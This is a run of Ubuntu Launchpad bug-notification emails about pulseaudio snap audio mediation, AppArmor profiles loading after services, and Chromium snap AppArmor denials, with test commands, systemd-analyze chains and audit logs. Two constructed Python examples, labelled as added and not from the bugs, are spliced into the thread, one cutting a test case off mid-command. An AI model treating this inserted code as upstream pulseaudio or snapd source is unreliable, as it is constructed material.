  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed:

  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

  The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

  [Test Case]
  IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy

  For unconfined applications:
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For confined, non-snap applications:
  $ sudo apt-get install evince
  $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
  $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
  yes

  For classic snaps:
  $ sudo snap install test-snapd-classic-confinement --classic
  $ snap run --shell test-snapd-classic-confinement
  $ cat /proc/self/attr/current # verify we are classic confined
  snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes
  $ exit # out of snap run --shell

  For strict snaps with pulseaudio:
  $ sudo snap install test-snapd-pulseaudio --edge
+ $ sudo snap connect test-snapd-pulseaudio:pulseaudio
  $ snap connections test-snapd-pulseaudio
  Interface   Plug                              Slot         Notes
  pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
  $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
  $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11
- interface not being connecting which is unrelated to mediation. x11 is
+ interface not being connected which is unrelated to mediation. x11 is
  left out to ensure that just audio-playback/audio-record are tested)
  $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
  ...
  ^Cyes
  $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
  ...
  yes

  For strict snaps with audio-playback/audio-record:
  $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04
  $ sudo snap install test-snapd-audio-record --edge
  $ snap connections test-snapd-audio-record # record not connected
  Interface       Plug                                    Slot             Notes
  audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
  audio-record    test-snapd-audio-record:audio-record    -                -
  $ test-snapd-audio-record.play --help # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio-record/common/
  $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo
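As an added example (not the pulseaudio module's code nor snapd-glib), the following Python models the record-mediation decision laid out in the bug description at the top of this thread and in the "Description changed" record above: map the client's AppArmor label to a snap name, ask snapd over its control socket whether the snap is classic and, if not, whether its pulseaudio or audio-record plug is connected. It assumes snapd's REST endpoints GET /v2/snaps/<name> and GET /v2/connections?snap=<name> on /run/snapd.socket; fake_snapd() is a constructed stand-in so the test-case scenarios can be checked offline, and denying when snapd cannot answer is this example's own choice, not something the description states.

```python
import http.client
import json
import socket
from typing import Callable, Dict, Optional

SNAPD_SOCKET = "/run/snapd.socket"                  # snapd's control socket
RECORD_INTERFACES = ("pulseaudio", "audio-record")  # either one permits record
Getter = Callable[[str], dict]


def snap_name_from_label(label: str) -> Optional[str]:
    """Map an AppArmor label to its snap name, or None for a non-snap.
    Snap labels look like 'snap.<snap>.<app>'; /proc/<pid>/attr/current may
    append a mode such as ' (complain)', as the classic test case shows."""
    label = label.split(" ", 1)[0]
    if not label.startswith("snap."):
        return None  # e.g. 'unconfined' or '/usr/bin/evince'
    parts = label.split(".")
    if len(parts) < 3 or not parts[1] or not parts[2]:
        return None
    return parts[1]


class _UnixHTTPConnection(http.client.HTTPConnection):
    """HTTP over a Unix socket, which is how snapd's REST API is reached."""

    def __init__(self, path: str):
        super().__init__("localhost")
        self._path = path

    def connect(self) -> None:
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self._path)


def snapd_get(path: str, sock_path: str = SNAPD_SOCKET) -> dict:
    """GET a snapd API path and return its 'result' (sync responses only)."""
    conn = _UnixHTTPConnection(sock_path)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        body = json.loads(resp.read())
    finally:
        conn.close()
    if resp.status != 200 or body.get("type") != "sync":
        raise RuntimeError(f"snapd {path}: HTTP {resp.status}, {body.get('type')}")
    return body["result"]


def may_record(label: str, get: Getter = snapd_get) -> bool:
    """Policy from the description: non-snaps and classic snaps may record;
    other snaps only if their pulseaudio or audio-record plug is connected.
    Denying when snapd cannot answer is this example's own choice."""
    snap = snap_name_from_label(label)
    if snap is None:
        return True
    try:
        if get(f"/v2/snaps/{snap}").get("confinement") == "classic":
            return True
        established = get(f"/v2/connections?snap={snap}").get("established", [])
    except (OSError, http.client.HTTPException, RuntimeError, KeyError, ValueError):
        return False
    for conn in established:
        if (conn.get("plug", {}).get("snap") == snap
                and conn.get("interface") in RECORD_INTERFACES):
            return True
    return False


def fake_snapd(state: Dict[str, dict]) -> Getter:
    """Constructed stand-in for snapd_get() so the example runs offline."""
    def get(path: str) -> dict:
        if path.startswith("/v2/snaps/"):
            return {"confinement": state[path[len("/v2/snaps/"):]]["confinement"]}
        if path.startswith("/v2/connections?snap="):
            snap = path.split("=", 1)[1]
            return {"established": [
                {"interface": iface, "plug": {"snap": snap, "plug": iface},
                 "slot": {"snap": "core", "slot": iface}}
                for iface in state[snap]["connected"]]}
        raise KeyError(path)
    return get


# Constructed state mirroring the test-case scenarios in the description.
DEMO_STATE = {
    "test-snapd-classic-confinement": {"confinement": "classic", "connected": []},
    "test-snapd-pulseaudio": {"confinement": "strict", "connected": ["pulseaudio"]},
    "test-snapd-audio-record": {"confinement": "strict", "connected": ["audio-playback"]},
}


def demo(get: Getter = fake_snapd(DEMO_STATE)) -> Dict[str, bool]:
    """Record decisions for the labels seen in the test cases above."""
    labels = ("unconfined", "/usr/bin/evince",
              "snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)",
              "snap.test-snapd-pulseaudio.record", "snap.test-snapd-audio-record.record")
    return {label: may_record(label, get) for label in labels}
```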
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Adding a snapd Ubuntu task, marking as In Progress and assigning to mvo since he is preparing a 20.04 upload.

** Also affects: snapd (Ubuntu)
   Importance: Undecided
       Status: New

** Changed in: snapd (Ubuntu Focal)
     Assignee: (unassigned) => Michael Vogt (mvo)

** Changed in: snapd (Ubuntu Focal)
       Status: New => In Progress

** Changed in: snapd (Ubuntu Focal)
   Importance: Undecided => High

** Changed in: snapd (Ubuntu Focal)
    Milestone: None => ubuntu-20.04

-- 
You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu.
https://bugs.launchpad.net/bugs/1871148

Title:
  services start before apparmor profiles are loaded

Status in AppArmor:
  Invalid
Status in snapd:
  Fix Released
Status in apparmor package in Ubuntu:
  Fix Released
Status in snapd package in Ubuntu:
  In Progress
Status in zsys package in Ubuntu:
  Invalid
Status in apparmor source package in Focal:
  Fix Released
Status in snapd source package in Focal:
  In Progress
Status in zsys source package in Focal:
  Invalid

Bug description:
  Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/.

  Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality.

  Previously, when running any snap I would receive the following in the terminal:
  ---
  cannot change profile for the next exec call: No such file or directory
  snap-update-ns failed with code 1: File exists
  ---

  Updated to add for Jamie:
  $ snap version
  snap    2.44.2+20.04
  snapd   2.44.2+20.04
  series  16
  ubuntu  20.04
  kernel  5.4.0-21-generic

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions

-- 
Mailing list: https://launchpad.net/~desktop-packages
Post to     : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help   : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Daniel, this is a different cause but same result:

zfs-load-module.service (2ms)
zfs-import-cache.service (8ms)
zfs-import.target
...
var-lib.mount (69ms)
...
snap-multipass-1869.mount (1.358s)
...
apparmor.service (279ms)
...

In this case, apparmor correctly waited for var-lib.mount, but multipass started before apparmor.service completed.

** Also affects: snapd
   Importance: Undecided
       Status: New

https://bugs.launchpad.net/bugs/1871148

Title:
  services start before apparmor profiles are loaded

Status in AppArmor:
  Invalid
Status in snapd:
  New
Status in apparmor package in Ubuntu:
  Fix Released
Status in zsys package in Ubuntu:
  Invalid
Status in apparmor source package in Focal:
  Fix Released
Status in zsys source package in Focal:
  Invalid
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Daniel responded on irc and said after several reboots with the new apparmor, everything was fine on every boot (though his critical-chain has var-lib.mount listed). My attached systemd-analyze plot svg shows that apparmor.service is indeed starting after var-lib.mount on the VM where the critical-chain didn't show it or zfs. On irc Didier thought that critical-chain would only list the longest path to apparmor.service starting and may not show everything (the man page isn't clear on this point IMHO).

Based on all of this, I'm going to tentatively mark the zsys task back to Invalid. If people continue to see this bug, we can reopen as necessary (in which case it might be a systemd task for not generating the mount units/requires/after correctly/in a race-free manner or it might indicate zfs initialization is perhaps slow and apparmor.service is starting before var-lib.mount is generated (and therefore RequiresMountsFor is satisfied). Or it is something else ;)

** Changed in: zsys (Ubuntu Focal)
       Status: New => Invalid

https://bugs.launchpad.net/bugs/1871148

Title:
  services start before apparmor profiles are loaded

Status in AppArmor:
  Invalid
Status in apparmor package in Ubuntu:
  Fix Released
Status in zsys package in Ubuntu:
  Invalid
Status in apparmor source package in Focal:
  Fix Released
Status in zsys source package in Focal:
  Invalid
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
All that said, Daniel and Jean-Baptiste, I installed 20.04 in a vm and tried to reproduce this and could not. The apparmor change was about correctness of the unit so I performed the upload, but I also hoped that it would address the issue you are seeing. I'm not certain it will.

On one boot, prior to upgrading apparmor, I saw:

$ sudo systemd-analyze critical-chain apparmor.service
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

apparmor.service +11.135s
└─local-fs.target @4.376s
  └─zfs-mount.service @4.327s +48ms
    └─var-lib-dpkg.mount @4.188s +137ms
      └─var-lib.mount @3.883s +250ms
        └─zfs-import.target @3.829s
          └─zfs-import-cache.service @3.125s +704ms
            └─zfs-load-module.service @3.121s +2ms
              └─systemd-udev-settle.service @1.183s +1.937s
                └─systemd-udev-trigger.service @933ms +248ms
                  └─systemd-udevd-kernel.socket @886ms
                    └─system.slice @535ms
                      └─-.slice @535ms

Note that var-lib.mount is already listed. On reboot though (without updating apparmor), I see:

$ sudo systemd-analyze critical-chain apparmor.service
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

apparmor.service +101ms
└─local-fs.target @2.812s
  └─run-user-122.mount @5.172s
    └─swap.target @1.823s
      └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms
        └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s

Oddly, no zfs entries are listed apparently because local-fs.target isn't pulling them in:

$ sudo systemd-analyze critical-chain local-fs.target
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

local-fs.target @2.812s
└─run-user-122.mount @5.172s
  └─swap.target @1.823s
    └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms
      └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s

Looking at var-lib.mount, I see zfs is in there:

$ sudo systemd-analyze critical-chain var-lib.mount
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

var-lib.mount +179ms
└─zfs-import.target @2.248s
  └─zfs-import-cache.service @1.845s +402ms
    └─zfs-load-module.service @1.840s +2ms
      └─systemd-udev-settle.service @692ms +1.143s
        └─systemd-udev-trigger.service @524ms +167ms
          └─systemd-udevd-kernel.socket @494ms
            └─system.slice @357ms
              └─-.slice @357ms

So why after a reboot did the dependencies change and drop the /var/lib entry from local-fs.target?

I then upgraded apparmor to have the RequiresMountsFor /var/lib/snapd/apparmor/profiles, rebooted and saw no difference:

$ sudo systemd-analyze critical-chain apparmor.service
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

apparmor.service +222ms
└─local-fs.target @2.562s
  └─run-user-122.mount @4.834s
    └─swap.target @1.687s
      └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.663s +24ms
        └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.662s

** Changed in: zsys (Ubuntu Focal)
       Status: Invalid => New

https://bugs.launchpad.net/bugs/1871148

Title:
  services start before apparmor profiles are loaded

Status in AppArmor:
  Invalid
Status in apparmor package in Ubuntu:
  Fix Released
Status in zsys package in Ubuntu:
  New
Status in apparmor source package in Focal:
  Fix Released
Status in zsys source package in Focal:
  New
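An added example, not from the bug or any package: a parser for the `systemd-analyze critical-chain` output quoted in the comment above that flags when a unit the service depends on, here var-lib.mount, is absent from apparmor.service's chain. The two chains are copied from that comment; as it also notes, critical-chain may only show the longest path, so an absent mount is a prompt to inspect the unit's ordering directly, not proof that it is missing.

```python
import re
from typing import List, NamedTuple, Optional


class ChainEntry(NamedTuple):
    unit: str
    depth: int                  # nesting level in the tree; the root is 0
    active_at: Optional[float]  # seconds after boot it became active ("@")
    took: Optional[float]       # seconds it took to start ("+")


_SPAN = r"(?:\d+min\s+)?\d+(?:\.\d+)?(?:ms|us|s)"
_LINE = re.compile(rf"^(?P<prefix>[\s│├└─]*)(?P<unit>\S+)"
                   rf"(?:\s+@(?P<at>{_SPAN}))?(?:\s+\+(?P<took>{_SPAN}))?\s*$")


def _seconds(span: Optional[str]) -> Optional[float]:
    """Convert systemd spans such as '1min 2.5s', '704ms', '48ms' to seconds."""
    if span is None:
        return None
    total = 0.0
    m = re.match(r"(\d+)min\s+(.*)", span)
    if m:
        total, span = 60.0 * int(m.group(1)), m.group(2)
    if span.endswith("ms"):
        return total + float(span[:-2]) / 1e3
    if span.endswith("us"):
        return total + float(span[:-2]) / 1e6
    return total + float(span[:-1])


def parse_critical_chain(text: str) -> List[ChainEntry]:
    """Parse `systemd-analyze critical-chain` output, skipping its two header
    lines; each tree level is indented by two columns."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("The time"):
            continue
        m = _LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised critical-chain line: {line!r}")
        entries.append(ChainEntry(m.group("unit"), len(m.group("prefix")) // 2,
                                  _seconds(m.group("at")), _seconds(m.group("took"))))
    return entries


def missing_from_chain(text: str, service: str, required: List[str]) -> List[str]:
    """Names in `required` that do not appear anywhere in service's chain."""
    entries = parse_critical_chain(text)
    if not entries or entries[0].unit != service:
        raise ValueError(f"chain does not start at {service}")
    present = {e.unit for e in entries}
    return [unit for unit in required if unit not in present]


def check_apparmor_chain(text: str) -> List[str]:
    """The check this bug calls for: is var-lib.mount in apparmor.service's chain?"""
    return missing_from_chain(text, "apparmor.service", ["var-lib.mount"])


# Both chains are copied from the comment above (raw strings, because the
# device unit names contain literal backslash escapes).
CHAIN_WITH_VARLIB = r"""
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

apparmor.service +11.135s
└─local-fs.target @4.376s
  └─zfs-mount.service @4.327s +48ms
    └─var-lib-dpkg.mount @4.188s +137ms
      └─var-lib.mount @3.883s +250ms
        └─zfs-import.target @3.829s
          └─zfs-import-cache.service @3.125s +704ms
            └─zfs-load-module.service @3.121s +2ms
              └─systemd-udev-settle.service @1.183s +1.937s
                └─systemd-udev-trigger.service @933ms +248ms
                  └─systemd-udevd-kernel.socket @886ms
                    └─system.slice @535ms
                      └─-.slice @535ms
"""

CHAIN_WITHOUT_VARLIB = r"""
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

apparmor.service +101ms
└─local-fs.target @2.812s
  └─run-user-122.mount @5.172s
    └─swap.target @1.823s
      └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms
        └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s
"""
```

Piping a live `systemd-analyze critical-chain apparmor.service` into parse_critical_chain gives the same structure, and check_apparmor_chain reports which required mounts the chain omits.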
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: snapd
       Status: In Progress => Fix Released

** Changed in: snapd (Ubuntu)
       Status: Triaged => Fix Released

-- 
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title:
  [snap] Permission denied on Private encrypted folder

Status in AppArmor:
  Fix Released
Status in snapd:
  Fix Released
Status in apparmor package in Ubuntu:
  In Progress
Status in chromium-browser package in Ubuntu:
  Invalid
Status in snapd package in Ubuntu:
  Fix Released

Bug description:
  When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

  Package: chromium-browser
  Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: apparmor
       Status: In Progress => Fix Released

** Also affects: apparmor (Ubuntu)
   Importance: Undecided
       Status: New

** Changed in: apparmor (Ubuntu)
   Importance: Undecided => Medium

** Changed in: apparmor (Ubuntu)
       Status: New => In Progress

** Changed in: apparmor (Ubuntu)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

https://bugs.launchpad.net/bugs/1848919

Title:
  [snap] Permission denied on Private encrypted folder

Status in AppArmor:
  Fix Released
Status in snapd:
  In Progress
Status in apparmor package in Ubuntu:
  In Progress
Status in chromium-browser package in Ubuntu:
  Invalid
Status in snapd package in Ubuntu:
  Triaged
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Reassigning the snapd task to apparmor in Ubuntu since it has a patch to rc.apparmor.functions to look for /var/lib/snapd/apparmor/profiles but does not add it to RequiresMountsFor.

** Project changed: snapd => apparmor

** Changed in: apparmor
       Status: Confirmed => In Progress

** Changed in: apparmor
   Importance: Critical => Undecided

** Changed in: apparmor
       Status: In Progress => Invalid

** Also affects: apparmor (Ubuntu)
   Importance: Undecided
       Status: New

** Changed in: apparmor (Ubuntu Focal)
       Status: New => In Progress

** Changed in: apparmor (Ubuntu Focal)
   Importance: Undecided => Critical

** Changed in: apparmor (Ubuntu Focal)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

https://bugs.launchpad.net/bugs/1871148

Title:
  services start before apparmor profiles are loaded

Status in AppArmor:
  Invalid
Status in apparmor package in Ubuntu:
  In Progress
Status in zsys package in Ubuntu:
  Confirmed
Status in apparmor source package in Focal:
  In Progress
Status in zsys source package in Focal:
  Confirmed
[Desktop-packages] [Bug 1864127] Re: apparmor denies ~/snap/chromium/ writes
Seth, I suspect if you stop the snap and restart it, these errors will go away.

-- 
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1864127

Title:
  apparmor denies ~/snap/chromium/ writes

Status in chromium-browser package in Ubuntu:
  New

Bug description:
  Hello, on focal with chromium from the snap package running I see a constant stream of apparmor denials:

  Feb 21 00:20:55 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000
  Feb 21 00:20:55 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access"
  Feb 21 00:20:55 millbarge audit: CWD cwd="/home/sarnold"
  Feb 21 00:20:55 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
  Feb 21 00:20:55 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
  Feb 21 00:20:55 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265
  Feb 21 00:20:58 millbarge bash[4126190]: Fri, 21 Feb 2020 00:20:58 + src 46 (fix: 3) currently receiving: 0,1@0 0,13@0 0,15@0 0,17@0 0,19@0 0,24@0 0,30@0 1,133@0 1,138@0 2,1@1 2,9@1 2,18@1 2,21@1 2,26@1 3,23@0 3,27@0 3,28@0
  Feb 21 00:21:05 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000
  Feb 21 00:21:05 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access"
  Feb 21 00:21:05 millbarge audit: CWD cwd="/home/sarnold"
  Feb 21 00:21:05 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
  Feb 21 00:21:05 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
  Feb 21 00:21:05 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265
  Feb 21 00:21:15 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000
  Feb 21 00:21:15 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsui
[Desktop-packages] [Bug 1864127] Re: apparmor denies ~/snap/chromium/ writes
$ aa-decode 2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C
Decoded: /home/sarnold/snap/chromium/1026/.config/chromium/Default/Sync Data/SyncData.sqlite3-journal

This sounds like perhaps the snap was refreshed while it was running. If so, it should be fixed with refresh-app-awareness in snapd, which is actively being worked on.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1864127

Title:
  apparmor denies ~/snap/chromium/ writes

Status in chromium-browser package in Ubuntu:
  New

Bug description:
  Hello, on focal with chromium from the snap package running I see a constant stream of apparmor denials:

  Feb 21 00:20:55 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000
  Feb 21 00:20:55 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access"
  Feb 21 00:20:55 millbarge audit: CWD cwd="/home/sarnold"
  Feb 21 00:20:55 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
  Feb 21 00:20:55 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
